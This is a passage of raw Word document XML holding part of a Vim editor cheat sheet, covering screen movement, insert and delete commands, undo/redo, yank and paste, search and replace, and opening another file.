        <w:t xml:space="preserve">around the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">screen</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B61">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Highest line on the screen: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">H</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Middle line on the screen: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">M</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lowest line on the screen: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">screen </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">around:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move the screen to the top of the window: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move the screen to the middle of the window: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zz</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="693"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Move the screen to the bottom of the window: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B68">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B6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6A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B6B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Editing Text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1284"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insert mode:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128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 Insert before the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Insert after the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B6F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128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o</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Open a new line below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128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O</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Open a new line above</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B71">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1284"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B72">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128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x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Delete the character under the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B73">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128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dd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Delete the entire line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128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 Delete from the cursor to the end of the line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1284"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Undo/Redo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B76">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Undo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1284"/>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Ctrl + r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Redo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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79">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B7A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Copy, Cut, and Paste</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1289"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy (yank):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1289"/>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yy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Copy the entire line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1289"/>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y$</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Copy from the cursor to the end of the line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1289"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cut (delete):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B7F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1289"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the same commands as delete (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dd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 etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1289"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Paste:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1289"/>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Paste after the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1289"/>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Paste before the cursor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B85">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Search and Replace</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="490"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Search:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="490"/>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/word</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Search forward for "word"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B88">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="490"/>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?word</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Search backward for "word"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B89">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="490"/>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n</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Repeat search in the same direction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="490"/>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N</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Repeat search in the opposite direction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="490"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="490"/>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:s/old/new/g</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Replace "old" with "new" in the current line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="490"/>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:%s/old/new/g</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Replace "old" with "new" in the entire file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B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8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B90">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Working with Multiple Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003B91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open another file: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:e otherfile</w:t>
      </w:r>
    </w:p>
